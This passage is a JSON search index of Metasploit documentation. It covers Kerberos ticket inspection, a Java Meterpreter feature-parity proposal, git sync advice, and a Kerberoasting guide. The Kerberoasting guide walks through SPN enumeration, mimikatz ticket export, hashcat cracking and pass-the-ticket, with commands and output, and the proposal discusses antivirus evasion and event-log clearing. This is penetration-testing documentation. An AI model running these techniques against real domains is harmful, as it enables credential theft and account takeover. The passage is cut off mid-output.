    "content": "Kerberos tickets can be acquired from multiple sources. For instance: . | Retrieved directly from the KDC with the get_ticket module | Forged using the forge_ticket module after compromising the krbtgt or a service account’s encryption keys | Extracted from memory using Meterpreter and mimikatz: | . meterpreter > load kiwi Loading extension kiwi...#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo) ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \\ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > kiwi_cmd \"sekurlsa::tickets /export\" Authentication Id : 0 ; 1393218 (00000000:00154242) Session : Network from 0 User Name : DC3$ Domain : DEMO Logon Server : (null) Logon Time : 1/12/2023 9:11:00 PM SID : S-1-5-18 * Username : DC3$ * Domain : DEMO.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 1/12/2023 7:41:41 PM ; 1/13/2023 5:37:45 AM ; 1/1/1601 12:00:00 AM Service Name (02) : LDAP ; DC3 ; @ DEMO.LOCAL Target Name (--) : @ DEMO.LOCAL Client Name (01) : DC3$ ; @ DEMO.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac ab64d555f18de6a3262d921e6dc75dcf884852f551db3114f7983dbaf276e1d6 Ticket : 0x00000012 - aes256_hmac ; kvno = 7 [...] ==================== Base64 of file : [0;154242][email protected] ==================== doQAAAYXMIQAAAYRoIQAAAADAgEFoYQAAAADAgEWooQAAAS2MIQAAASwYYQAAASq MIQAAASkoIQAAAADAgEFoYQAAAAMGwpBREYzLkxPQ0FMooQAAAAmMIQAAAAgoIQA AAADAgECoYQAAAARMIQAAAALGwRMREFQGwNEQzOjhAAABFcwhAAABFGghAAAAAMC ... etc... ==================== . Note that tools often Base64 encode the Kirbi content to display to the user. 
However, the inspect_ticket module expects the input file to be in binary format. To convert base64 strings to binary files: . # Linux cat ticket.b64 | base64 -d > ticket.kirbi # Mac cat ticket.b64 | base64 -D > ticket.kirbi # PowerShell [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"<base64_ticket>\")) . ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#acquiring-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#acquiring-tickets"
  },"495": {
    "doc": "Inspecting tickets",
    "title": "Module usage",
    "content": ". | Start msfconsole | Do: use auxiliary/admin/kerberos/inspect_ticket | Do: set TICKET_PATH /path/to/ccache/file | Optional: either set AES_KEY aes_key_here or set NTHASH nthash_here - which will attempt to decrypt tickets | Do: run to see the contents of the ticket | . ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#module-usage"
  },"496": {
    "doc": "Inspecting tickets",
    "title": "Scenarios",
    "content": "Inspecting Ticket contents . This action allows you to see the contents of any ccache or kirbi file. If you are able to provide the decryption key, we can also show the encrypted parts of the ticket. | TICKET_PATH - The path to the ccache or kirbi file. | AES_KEY - (Optional) Only set this if you have the decryption key and it is an AES128 or AES256 key. | NTHASH - (Optional) Only set this if you have the decryption key and it is an NTHASH. No other options are used in this action. | . Without Key . msf6 auxiliary(admin/kerberos/inspect_ticket) > run TICKET_PATH=/path/to/ticket Primary Principal: [email protected] Ccache version: 4 Creds: 1 Credential[0]: Server: cifs/[email protected] Client: [email protected] Ticket etype: 18 (AES256) Key: 3436643936633032656264663030393931323461366635653364393932613763 Ticket Length: 978 Subkey: false Addresses: 0 Authdatas: 0 Times: Auth time: 2022-11-21 13:52:00 +0000 Start time: 2022-11-21 13:52:00 +0000 End time: 2032-11-18 13:52:00 +0000 Renew Till: 2032-11-18 13:52:00 +0000 Ticket: Ticket Version Number: 5 Realm: WINDOMAIN.LOCAL Server Name: cifs/dc.windomain.local Encrypted Ticket Part: Ticket etype: 18 (AES256) Key Version Number: 2 Cipher: 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 . With Key . 
msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket Primary Principal: [email protected] Ccache version: 4 Creds: 1 Credential[0]: Server: cifs/[email protected] Client: [email protected] Ticket etype: 18 (AES256) Key: 3436643936633032656264663030393931323461366635653364393932613763 Ticket Length: 978 Subkey: false Addresses: 0 Authdatas: 0 Times: Auth time: 2022-11-21 13:52:00 +0000 Start time: 2022-11-21 13:52:00 +0000 End time: 2032-11-18 13:52:00 +0000 Renew Till: 2032-11-18 13:52:00 +0000 Ticket: Ticket Version Number: 5 Realm: WINDOMAIN.LOCAL Server Name: cifs/dc.windomain.local Encrypted Ticket Part: Ticket etype: 18 (AES256) Key Version Number: 2 Decrypted (with key: \\x4b\\x91\\x2b\\xe0\\x36\\x6a\\x6f\\x37\\xf4\\xa7\\xd5\\x71\\xbe\\xe1\\x8b\\x11\\x73\\xd9\\x31\\x95\\xef\\x76\\xf8\\xd1\\xe3\\xe8\\x1e\\xf6\\x17\\x2a\\xb3\\x26): Times: Auth time: 2022-11-21 13:52:00 UTC Start time: 2022-11-21 13:52:00 UTC End time: 2032-11-18 13:52:00 UTC Renew Till: 2032-11-18 13:52:00 UTC Client Addresses: 0 Transited: tr_type: 0, Contents: \"\" Client Name: 'Administrator' Client Realm: 'WINDOMAIN.LOCAL' Ticket etype: 18 (AES256) Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763 Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT) PAC: Validation Info: Logon Time: 2022-11-21 13:52:00 +0000 Logoff Time: Never Expires (inf) Kick Off Time: Never Expires (inf) Password Last Set: No Time Set (0) Password Can Change: No Time Set (0) Password Must Change: Never Expires (inf) Logon Count: 0 Bad Password Count: 0 User ID: 500 Primary Group ID: 513 User Flags: 0 User Session Key: \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 User Account Control: 528 Sub Auth Status: 0 Last Successful Interactive Logon: No Time Set (0) Last Failed Interactive Logon: No Time Set (0) Failed Interactive Logon Count: 0 
SID Count: 0 Resource Group Count: 0 Group Count: 5 Group IDs: Relative ID: 513, Attributes: 7 Relative ID: 512, Attributes: 7 Relative ID: 520, Attributes: 7 Relative ID: 518, Attributes: 7 Relative ID: 519, Attributes: 7 Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369 Effective Name: 'Administrator' Full Name: '' Logon Script: '' Profile Path: '' Home Directory: '' Home Directory Drive: '' Logon Server: '' Logon Domain Name: 'WINDOMAIN.LOCAL' Client Info: Name: 'Administrator' Client ID: 2022-11-21 13:52:00 +0000 Pac Server Checksum: Signature: \\x04\\xe5\\xab\\x06\\x1c\\x7a\\x90\\x9a\\x26\\xb1\\x22\\xc2 Pac Privilege Server Checksum: Signature: \\x71\\x0b\\xb1\\x83\\x85\\x82\\x57\\xf4\\x10\\x21\\xbd\\x7e . Both of these examples are printing the contents of the same ccache file and showing the difference in output if you have the decryption key available. ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#scenarios"
  },"497": {
    "doc": "Inspecting tickets",
    "title": "Inspecting tickets",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html"
  },"498": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Java Meterpreter Feature Parity",
    "content": "Metasploit Framework has separate Meterpreter implementations for different platforms. Currently there is a feature disparity between e.g. Windows (x86) and PHP, Python and Java. For instance, the Java Meterpreter only implements 25% of stdapi on Windows, in comparison to the Python Meterpreter’s 50% coverage, or the Windows Meterpreter’s 94% coverage. Java does have out of the box support for many of the library calls that we would require for improving Meterpreter compatibility, i.e. to manipulate the Windows event log, support Railgun etc. To implement feature parity the following pull requests were spiked: . | Add clearev command on Windows using JNA - Adding Meterpreter’s event log manipulation commands. Uses an off-the-shelf library for making native system calls via JNA. This approach would allow for implementation of the remaining calls that aren’t supported by Java out of the box. | Add Railgun support to Java Meterpreter against Windows - Using a custom library for Railgun support | . This proposal evaluates different approaches on how this feature parity could be achieved, what difficulties we have faced, and the future work required. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#java-meterpreter-feature-parity",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#java-meterpreter-feature-parity"
  },"499": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Glossary",
    "content": ". | FFI - Foreign Function Interface - A foreign function interface (FFI) is a mechanism by which a program written in one programming language can call routines or make use of services written in another. | JNI - Java Native Interface is a foreign function interface programming framework that enables Java code running in a Java Virtual Machine (JVM) to call and be called by native applications (programs specific to a hardware and operating system platform) and libraries written in other languages such as C, C++ and assembly. | JNA - Java Native Access is a community-developed library that provides Java programs easy access to native shared libraries; under the covers it still uses JNI. It only supports Java 1.6+. | Railgun - Meterpreter API which allows for programmatic access to native libraries via Ruby. The Windows implementation is available here. | . ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#glossary",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#glossary"
  },"500": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Solution Overview",
    "content": "To improve the Java Meterpreter’s feature parity we will: . | Add support for native system calls | Add support for Railgun capabilities | . To implement this functionality we will: . | Use the open source JNA library for generic system calls | Create a custom C library for Railgun support | Update core api to expose system information to deduce the platform type | Update Java stdapi to now include the library files for Railgun + JNA by default, i.e. the dll/so/dylib files for Railgun/JNA - an extra ~200KB uncompressed on top of the existing 54KB compressed (228KB uncompressed) | Load the Railgun/JNA libraries on demand when the Meterpreter command is invoked, for now this will require a write to disk - discussed further below | Update CI/Maven build steps | . Alternative implementation steps are also documented. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#solution-overview",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#solution-overview"
  },"501": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Implementation",
    "content": "Supporting native system calls . We will move the OS detection from stdapi to core. This would allow us to detect the victim’s OS and architecture as part of the core API, allowing stdapi to additionally include the correct Railgun and JNA dll/so/dylib library files. Native call support will be provided by JNA - an open source library which provides easy access to Windows APIs. Using JNA would help reduce the boilerplate for making Windows API calls, is maintained by an existing community, and is less likely to be detected as malicious. The sequence of steps required for loading stdapi and invoking the clear event log command: . sequenceDiagram msfconsole->>+meterpreter: load core library meterpreter-->>-msfconsole: return success and list of available commands msfconsole->>+meterpreter: get architecture from core library meterpreter-->>-msfconsole: e.g. Windows 10 x64 msfconsole->>+meterpreter: load stdapi - i.e. classfiles + JNA + Railgun dll meterpreter->>meterpreter: Load new java commands note right of meterpreter: Keep JNA + Railgun library in memory<br />Don't load them yet meterpreter-->>-msfconsole: return success and list of available commands msfconsole->>+meterpreter: clear event log rect rgb(191, 223, 255, .3) note right of meterpreter: Load JNA if it's <br >not been loaded before meterpreter->>meterpreter: Copy JNA from classpath to file system meterpreter->>meterpreter: System.load(temp path) meterpreter->>meterpreter: delete temp path end meterpreter->>meterpreter: clear event log using JNA meterpreter-->>-msfconsole: clear event log result . Railgun support . Railgun requires access to low-level functionality, i.e. directly manipulating memory etc. Java does not support this functionality directly unless a Java wrapper is provided. 
Therefore a JNI wrapper for the current Railgun implementation will be developed - similar to the previous prototype. Maven would be updated to build this library for different architectures/platforms. Similar to the implementation of native system calls, we will move the OS detection from stdapi to core. This would allow us to detect the victim’s OS and architecture as part of the core API, allowing stdapi to additionally include the correct Railgun and JNA dll/so/dylib library files. Once a native call needs to be executed, Meterpreter would attempt to load JNA and use it to call the native Windows API to begin the process of reflectively loading the compiled Railgun library. The sequence of steps required for loading stdapi and invoking Railgun: . sequenceDiagram msfconsole->>+meterpreter: load core library meterpreter-->>-msfconsole: return success and list of available commands msfconsole->>+meterpreter: get architecture from core library meterpreter-->>-msfconsole: e.g. Windows 10 x64 msfconsole->>+meterpreter: load stdapi - i.e. 
classfiles + JNA + Railgun dll meterpreter->>meterpreter: Load new java commands note right of meterpreter: Keep JNA + Railgun library in memory<br />Don't load them yet meterpreter-->>-msfconsole: return success and list of available commands msfconsole->>+meterpreter: Railgun call rect rgb(191, 223, 255, .3) note right of meterpreter: Load JNA if it's <br >not been loaded before meterpreter->>meterpreter: Copy JNA from classpath to file system meterpreter->>meterpreter: System.load(tempPath) meterpreter->>meterpreter: tempPath.deleteOnExit() end rect rgb(191, 223, 255, .3) note right of meterpreter: Load Railgun if it's <br >not been loaded before meterpreter->>meterpreter: Use JNA to reflectively load Railgun end meterpreter->>meterpreter: invoke Railgun call meterpreter-->>-msfconsole: Railgun result . For an initial release the Railgun and JNA libraries would be sent as part of stdapi. This would increase the size to about 200KB on top of the 70KB Meterpreter Jar (228KB uncompressed). We will also keep Railgun in stdapi (where it currently lives). Alternative Implementation 1 . An alternative solution to updating stdapi to additionally include Railgun/JNA is to keep stdapi as it exists today, and to attempt loading a ‘bigger’ stdapi with the additional Railgun functionality when a post module requires Railgun. This would work as follows: . sequenceDiagram msfconsole->>+meterpreter: load core library meterpreter-->>-msfconsole: return success and list of available commands msfconsole->>+meterpreter: get architecture from core library meterpreter-->>-msfconsole: e.g. 
Windows 10 x64 msfconsole->>+meterpreter: load stdapi as normal, without JNA/Railgun meterpreter->>meterpreter: Load new java commands meterpreter-->>-msfconsole: return success and list of available commands user->>+msfconsole:run post module: msfconsole->>msfconsole: Load module, verify requirements opt If module requires Railgun, and session hasn't been sent Railgun/JNA before rect rgb(191, 223, 255, .3) msfconsole->>+meterpreter: load 'bigger' stdapi - i.e. classfiles + JNA + Railgun dll meterpreter->>meterpreter: Load new java commands note right of meterpreter: Keep JNA + Railgun library in memory<br />Don't load them yet meterpreter-->>-msfconsole: return success and list of available commands end end msfconsole->>+meterpreter: Railgun call rect rgb(191, 223, 255, .3) note right of meterpreter: Load JNA if it's <br >not been loaded before meterpreter->>meterpreter: Copy JNA from classpath to file system meterpreter->>meterpreter: System.load(tempPath) meterpreter->>meterpreter: tempPath.deleteOnExit() end rect rgb(191, 223, 255, .3) note right of meterpreter: Load Railgun if it's <br >not been loaded before meterpreter->>meterpreter: Use JNA to reflectively load Railgun end meterpreter->>meterpreter: invoke Railgun call meterpreter-->>-msfconsole: Railgun result msfconsole-->>-user: Module results . Unfortunately the Meterpreter compatibility data in modules is not granular enough, and it is likely that a post module will implicitly load Railgun via a transitive module mixin. For instance, at the time of writing the lib/msf/core/post/file.rb mixin specifies a requirement on Railgun. 
This would result in most modules sending the Railgun/JNA libraries to Meterpreter when they are not required, as it is unlikely that the get_drives method would be invoked. This compatibility metadata could be improved, but is a blocker for this implementation. Alternative Implementation 2 . An alternative implementation to moving the architecture detection from stdapi to core - would be to include all possibly supported platform types for the JNA / Railgun libraries - approx. 3MB of additional data. This is not a viable solution. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#implementation",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#implementation"
  },"502": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Loading Libraries",
    "content": "Java supports loading native libraries with either System.load(String libname) or System.loadLibrary(String filename). These methods require writing the shared library to disk temporarily, as Java does not support loading libraries from memory. When temporarily extracting the JNA library to disk, we would need to make sure that we can delete it when we are done with the Meterpreter session. This can be achieved using Java’s File.deleteOnExit() method. This is executed only if the session exits as expected; crashes or getting killed by the AV result in the library being left on disk. Writing a shared library to disk is an easy way to get flagged by an AV that’s running on the victim’s machine. This might not be an issue, since to get a Java Meterpreter session in the first place an AV such as Microsoft Defender has to be disabled, and the JNA library might be white-listed. Another approach that we have briefly evaluated is running shellcode from Java without using JNI, which may be possible with schierlm’s Java Shellcode prototype, which can execute shellcode in memory. There may be compatibility edge cases with each JDK/JRE version, depending on the JVM memory layout. This approach has only been verified to work on 32-bit Oracle Java 6. Each Java version may require additional logic, and automated/manual verification steps to ensure it works as expected. The development effort to support x64 is currently unknown. The shellcode used with the JIT Shellcode Runner would let us load a shared library from memory. This would avoid the need to write the shared library to disk. Therefore, the short term solution is: . | Write JNA to disk, as it’s got a higher chance of being allowed by the file system | Use JNA to reflectively load our custom Railgun C library - resulting in the Railgun library not being written to disk | . The long term solution is: . 
| Attempt to load JNA reflectively, which may be possible with schierlm’s Java Shellcode prototype - but the proof of concept was only verified to currently work with 32-bit Java 1.7, and may not work on newer versions | Use the above reflection approach to also load Railgun | . ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#loading-libraries",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#loading-libraries"
  },"503": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "CI/Maven changes",
    "content": "Maven would be updated to build the Railgun libraries for each supported platform/architecture. The required build artifacts would be chosen at runtime by msfconsole and sent to the Java Meterpreter session as part of stdapi. An alternative to msfconsole bundling the stdapi dependencies at runtime would be to build multiple pre-built Meterpreter Jar files, one for each supported platform/architecture. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#cimaven-changes",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#cimaven-changes"
  },"504": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Conclusion",
    "content": "There are quite a few moving parts to implementing this solution for Java. The simplest approaches have been chosen for this proposal. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#conclusion",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#conclusion"
  },"505": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Java Meterpreter Feature Parity Proposal",
    "content": " ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html"
  },"506": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "Some Terminology",
    "content": "In this quick HOWTO, we’ll be referring to the rapid7 fork of metasploit-framework as upstream. It’s a pretty common local configuration, advocated by the development environment setup. Your fork of metasploit-framework will be referred to as origin. The term ‘repo’ is short for ‘Repository.’ Also known as ‘fork’ (as a noun). ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#some-terminology",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#some-terminology"
  },"507": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "The Easy Way",
    "content": "The easiest way to keep in sync with master is to trash your fork of metasploit-framework, and re-fork. This is a surprisingly common practice, since most people in the world don’t work with Metasploit every day. If you’re the sort to be struck by hackerish inspiration every few months, and couldn’t give a whit about preserving branches, history, or pull requests, simply nuke your local fork. On your fork, in the GitHub UI, go to Settings, scroll down to the Danger Zone, and hit Delete this repository. Once you’ve re-authenticated, re-fork the metasploit-framework repository by going to the Rapid7 repo and hit Fork as hard as you possibly can. ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-easy-way",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-easy-way"
  },"508": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "The Hard Way",
    "content": "If you’re contributing to the Metasploit Framework a lot, first off, THANK YOU. Metasploit is more than a framework, it’s a collective and a community of people around the world who are driven to make the Internet – and therefore, human civilization – a better place. Gushing aside, if you want to keep in sync with upstream, the hard way (and therefore, best way) is to have a local clone of origin (your metasploit-framework fork) on your local workstation. (Linux is preferred, but there are serviceable solutions for OSX and Windows). And, with that said, the GitHub documentation is pretty excellent in explaining how to do this – it’s really not all that hard. Take a look at their Fork A Repo docs, and do what it says. One thing I like to do is to keep separate branches for master (which tracks origin/master), and upstream-master (which tracks, unsurprisingly, upstream/master). If you just want to know how to add an upstream remote, check it out. Once you’ve done that, all you need to do is to pull one of these: . git checkout -b upstream-master --track upstream/master git checkout master git merge --ff-only upstream-master git push origin . The --ff-only merge creates no new commit, so there is nothing to commit before pushing; if it refuses to fast-forward, you have local commits on master. This only works well if you never commit to master. If you do, you’re going to have a bad time, as you’ll eventually hit a dreaded merge conflict. Any change you make, be it for local experimentation or public proposal, should be done in a branch from the master branch (or, if you’re a habitual committer, a branch off the upstream-master branch). Ignore this advice at your own peril. ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-hard-way",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-hard-way"
  },"509": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "The Max Powers Way",
    "content": "It’s like the wrong way, but faster. - Max Powers . If you are allergic to the command line, it is possible to sync with upstream/master via the GitHub web UI. This is a little messy, but it’s handy if you have small changes that you don’t care to sign (by the way, you should sign your commits). First, go to the Rapid7 branch, and click the green, somewhat subtle mini-PR button. Then, click Compare across forks, and set base fork to your fork, while leaving the head fork pointing to Rapid7’s fork. That’ll take you to a URL like this: https://github.com/rapid7/metasploit-framework/compare/YOURGITHUBNAME:master...master . Next, you’ll hit the big green Create a Pull Request button, which will drop you to a new PR page, against your own fork. Fill it in, then immediately click the PRs icon on the left side, find your new PR, and merge it. This will keep your GitHub-hosted fork up-to-date, and if you prefer using the GitHub UI over a real development environment, you can jump in and start making changes there. This method is especially handy for light changes, like documentation or cosmetic changes to modules. However, using the GitHub UI means that you are necessarily not testing new modules or libraries, and you of course cannot sign your commits, which is horrifying. It’s also nice for people very new to GitHub as a collaborative platform. ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-max-powers-way",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-max-powers-way"
  },"510": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "Keeping in sync with rapid7 master",
    "content": " ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html"
  },"511": {
    "doc": "Kerberoasting",
    "title": "Kerberoasting",
    "content": "Kerberoasting is a technique that finds Service Principal Names (SPNs) in Active Directory that are associated with normal user accounts on the domain, and then requests Ticket Granting Service (TGS) tickets for those services from the KDC, which any authenticated domain user may do. Each TGS ticket is encrypted with a key derived from the service account’s password, so the ticket can be taken offline and brute-forced; if the password is weak, it will be recovered. Services are normally configured to use computer accounts, which have very long, random passwords, but services associated with normal user accounts have passwords entered by a human, which may be short and weak - and a good target for brute-force attacks. If successful, the attacker possesses the service account’s credentials and can impersonate it. The attacker now appears to be an approved and legitimate user, with access to the same privileges, assets, systems, etc, that have been granted to the compromised account, boom roasted. ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberoasting.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberoasting.html"
  },"512": {
    "doc": "Kerberoasting",
    "title": "Vulnerable Targets",
    "content": "Any system that uses Kerberos for authentication, e.g. Active Directory or MSSQL, where a Service Principal Name (SPN) is registered on a normal user account in the domain. ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#vulnerable-targets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#vulnerable-targets"
  },"513": {
    "doc": "Kerberoasting",
    "title": "Lab Environment",
    "content": "For testing purposes on an Active Directory environment you can create a user account and register an SPN manually as an example of this technique: . # Create a basic user account with a weak password for our service net user /add svc_kerberoastable password123 # Mark the account and password as never expiring, to ensure the lab setup still works in the future net user svc_kerberoastable /expires:never powershell /c Set-AdUser -Identity svc_kerberoastable -PasswordNeverExpires $true # Create a Service Principal Name which uses the user account with a weak password cmd /c setspn -a %computername%/svc_kerberoastable.%userdnsdomain%:1337 %userdomain%\\svc_kerberoastable . ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#lab-environment",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#lab-environment"
  },"514": {
    "doc": "Kerberoasting",
    "title": "Scenarios",
    "content": "Using get_user_spns . The easiest way to enumerate Kerberoastable accounts is with the auxiliary/gather/get_user_spns module, which internally leverages Impacket. This module queries LDAP for user accounts with SPNs and requests a Kerberos service ticket for each; the ticket is encrypted with the account’s password and can be brute-forced offline: . use auxiliary/gather/get_user_spns run rhost=192.168.123.13 user=&amp;lt;username&amp;gt; pass=&amp;lt;password&amp;gt; domain=&amp;lt;domain&amp;gt; . If you followed the lab setup above, this should output the following result: . msf6 auxiliary(gather/get_user_spns) &amp;gt; run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local [*] Running for 192.168.123.13... [+] ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation [+] -------------------------------------- ------------------ -------- -------------------------- --------- ---------- [+] DC3/svc_kerberoastable.ADF3.LOCAL:1337 svc_kerberoastable 2023-01-23 23:52:19.445592 &amp;lt;never&amp;gt; [+] $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1dcdcef4c926cb263abedf75ed$263fea3ad446bd6b4b8... etc etc ... The final line contains the service ticket hash in a crackable format. The $krb5tgs$23$ prefix indicates an RC4-HMAC ticket, which hashcat mode 13100 handles; AES tickets appear as $krb5tgs$17$ or $krb5tgs$18$ and need modes 19600 or 19700 respectively. Next paste this hash $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1..etc etc... into a new file called hash.txt You can run Hashcat to crack the hash with a wordlist of choice, and see if the status of the hash has been marked as cracked: . $ hashcat -m 13100 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt ... etc ... Session..........: hashcat Status...........: Cracked ... etc ... If the password has been cracked you can view the result at a later date with the above command and --show appended: . 
$ hashcat -m 13100 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1dcdcef4c926cb...etc etc...:password123 ^ cracked password . Now that you have access to the password of the service account, you can use this to enumerate further in the AD environment. Manual workflow . An alternative to the easier get_user_spns module above is the more manual process of running the LDAP query module to find Kerberoastable accounts, requesting service tickets with Kiwi, converting the Kiwi ticket to a format usable by hashcat, and cracking the hash. | Start msfconsole | Obtain SPNs associated with user accounts from your target . | Do: use auxiliary/gather/ldap_query | Do: set action ENUM_USER_SPNS_KERBEROAST | Run the module and note the discovered SPNs | . | From your Meterpreter session: . | Do: load kiwi | Do: Request a kerberos ticket for SPN found by the ldap_query module: kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000 | Do: kerberos_ticket_list | . | Export service tickets using the kiwi extension . | Do: kiwi_cmd kerberos::list /export | . | Crack the encrypted password in the service ticket using tgsrepcrack.py (more info on this python script below) . | Do: python3 tgsrepcrack.py passlist.txt 1-40a10000-Administrator@HTTP\\~testService-EXAMPLE.COM.kirbi | . | Rewrite the service tickets using kerberoast.py (more info on this python script below) . | Do: python3 kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500 | . | Finally inject the ticket back into RAM using Meterpreter’s kiwi extension . | meterpreter &amp;gt; kiwi_cmd kerberos::ptt Administrator.kirbi | . | . First an SPN needs to be found. This can be done in a number of ways - including using metasploit’s very own auxiliary/gather/ldap_query module: . 
msf6 &amp;gt; use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) &amp;gt; set RHOSTS 172.16.199.235 RHOSTS =&amp;gt; 172.16.199.235 msf6 auxiliary(gather/ldap_query) &amp;gt; set BIND_DN DARWIN_CLAY BIND_DN =&amp;gt; DARWIN_CLAY msf6 auxiliary(gather/ldap_query) &amp;gt; set BIND_PW N0tpassword! BIND_PW =&amp;gt; N0tpassword! msf6 auxiliary(gather/ldap_query) &amp;gt; set action ENUM_USER_SPNS_KERBEROAST action =&amp;gt; ENUM_USER_SPNS_KERBEROAST msf6 auxiliary(gather/ldap_query) &amp;gt; run [*] Running module against 172.16.199.235 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.16.199.235:389 Getting root DSE dn: namingcontexts: DC=example,DC=com namingcontexts: CN=Configuration,DC=example,DC=com namingcontexts: CN=Schema,CN=Configuration,DC=example,DC=com ... ====================================================================== Name Attributes ---- ---------- cn BERYL_SAVAGE samaccountname BERYL_SAVAGE serviceprincipalname CIFS/OGCWLPT1000000 CN=CAITLIN_CAMPBELL OU=Devices OU=FIN OU=Tier 1 DC=example DC=com ================================================================= Name Attributes ---- ---------- cn CAITLIN_CAMPBELL samaccountname CAITLIN_CAMPBELL serviceprincipalname ftp/BDEWSECS1000000 CN=NETTIE_BURNS OU=ITS OU=Stage DC=example DC=com ================================================= Name Attributes ---- ---------- cn ALBERTO_OLSEN samaccountname ALBERTO_OLSEN serviceprincipalname https/TSTWWKS1000002 CN=LESSIE_PHILLIPS OU=Test OU=GOO OU=Stage DC=example DC=com ============================================================ . Great, we now have a couple SPNs to move forward with. Request Service Tickets - with kiwi . If you have a running Meterpreter session you can request a Service Ticket using the kiwi extension and one of the SPNs found above: . meterpreter &amp;gt; load kiwi Loading extension kiwi...#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. 
